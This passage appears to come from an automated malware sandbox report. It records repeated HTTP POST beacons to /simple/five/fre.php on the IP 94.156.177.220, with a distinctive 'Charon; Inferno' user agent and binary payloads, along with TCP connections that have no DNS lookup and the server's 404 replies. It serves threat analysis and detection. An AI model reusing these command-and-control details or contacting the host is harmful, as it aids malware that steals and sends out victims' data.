              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.220
              Source: unknownHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
